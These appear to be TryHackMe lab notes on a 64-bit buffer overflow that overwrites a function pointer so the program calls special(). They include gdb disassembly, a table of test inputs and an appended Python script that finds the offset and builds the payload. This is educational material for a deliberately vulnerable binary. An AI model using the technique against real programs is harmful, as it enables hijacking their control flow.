
THM - Buffer Overflow - T7

Check the address of special (the address of its first instruction is the value we need to write into the function pointer)

(gdb) disassemble special
Dump of assembler code for function special:
   0x0000000000400567 <+0>:     push   %rbp             <-- special starts at 0x400567
   0x0000000000400568 <+1>:     mov    %rsp,%rbp
   0x000000000040056b <+4>:     mov    $0x400680,%edi
   0x0000000000400570 <+9>:     callq  0x400460 <puts@plt>
   0x0000000000400575 <+14>:    mov    $0x40069d,%edi
   0x000000000040057a <+19>:    callq  0x400460 <puts@plt>
   0x000000000040057f <+24>:    nop
   0x0000000000400580 <+25>:    pop    %rbp
   0x0000000000400581 <+26>:    retq
End of assembler dump.

Little endian

x86-64 stores pointers least-significant byte first, so the bytes of 0x400567 are reversed before they go into the payload:

\x00\x00\x00\x40\x05\x67  -->  \x67\x05\x40\x00\x00\x00

The full pointer is 8 bytes (\x67\x05\x40\x00\x00\x00\x00\x00); six are enough here because the top two bytes of the stored pointer (0x00007fff...) are already zero and do not need to be overwritten.

Control over the function pointer (the value that ends up in RIP when the program calls it; the 64-bit register is RIP, not EIP)

gdb func-pointer
(gdb) run
AAAAAAAAAAAAAAAAAAAA
--> 0x0000414141414141      (20 A's: the low six bytes of the pointer are now 0x41, 'A')

Example payloads

Payload                                   Response (printed function pointer)
AAAAAAAAAAAAAA (14 A's)                   0x00007fffffffeb27   pointer untouched
AAAAAAAAAAAAAAAA (16 A's)                 0x0000000000004141   low 2 bytes overwritten, so the pointer starts at offset 14
AAAAAAAAAAAAAAAAA (17 A's)                0x0000000000414141
AAAAAAAAAAAAAAAAAA (18 A's)               0x0000000041414141
AAAAAAAAAAAAAAAAAAAA (20 A's)             0x0000414141414141
AAAAAAAAAAAAAA\x67\x05\x40\x00\x00\x00    you did this, friend!   (special() was called)
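The payload construction behind the table above, as an added example that is not part of the THM room or of these notes: it packs the address of special little endian, derives the function-pointer offset from the partially overwritten responses (each sample must give the same answer, otherwise the guessed layout is wrong), and writes the raw bytes to stdout. SPECIAL_ADDR comes from the disassembly and OBSERVED is constructed from the table above; the delivery commands in the comments are assumptions, since the notes do not show how the bytes were fed to the binary. It writes all 8 bytes of the pointer rather than the 6 used in the notes; both variants rely on the input routine accepting NUL bytes, which the working 6-byte payload already demonstrates.

```python
import sys

# Address of special(), taken from `disassemble special` in the notes above.
SPECIAL_ADDR = 0x400567

# Constructed from the table above: payload length (number of 'A's) -> pointer
# value the program printed back.
OBSERVED = {
    14: 0x00007FFFFFFFEB27,
    16: 0x0000000000004141,
    17: 0x0000000000414141,
    18: 0x0000000041414141,
    20: 0x0000414141414141,
}


def pack_addr(addr: int, width: int = 8) -> bytes:
    """Encode addr little endian (least-significant byte first) in `width` bytes."""
    return addr.to_bytes(width, "little")


def hex_escapes(data: bytes) -> str:
    """Render bytes in the \\x.. notation used in the notes, for pasting."""
    return "".join(f"\\x{b:02x}" for b in data)


def overwritten_bytes(value: int, fill: int = 0x41) -> int:
    """Count how many low-order bytes of the printed pointer now hold the fill byte."""
    n = 0
    while value & 0xFF == fill:
        n += 1
        value >>= 8
    return n


def infer_offset(observed: dict, fill: int = 0x41) -> int:
    """Offset of the function pointer from the start of the buffer.

    A payload of length L that turned the low n bytes of the pointer into the
    fill byte began overwriting it at byte L - n. Samples that did not reach
    the pointer carry no information; the rest must agree.
    """
    offsets = set()
    for length, value in observed.items():
        n = overwritten_bytes(value, fill)
        if n > 0:
            offsets.add(length - n)
    if len(offsets) != 1:
        raise ValueError(f"samples disagree on the offset: {sorted(offsets)}")
    return offsets.pop()


def build_payload(offset: int, target: int, fill: bytes = b"A", width: int = 8) -> bytes:
    """Pad up to the pointer, then overwrite it with the little-endian target."""
    return fill * offset + pack_addr(target, width)


if __name__ == "__main__":
    payload = build_payload(infer_offset(OBSERVED), SPECIAL_ADDR)
    # Assumed delivery (not shown in the notes). Raw bytes, NULs included:
    #   python3 exploit.py | ./func-pointer
    # Inside gdb:
    #   python3 exploit.py > payload.bin
    #   (gdb) run < payload.bin
    sys.stdout.buffer.write(payload)
```

Deriving the offset from several samples, rather than from the single 16-byte response, catches a mistaken layout guess early: if the pointer were not contiguous with the buffer, or the copy stopped on some byte, the lengths would not all point at the same offset and infer_offset raises instead of producing a payload that silently misses.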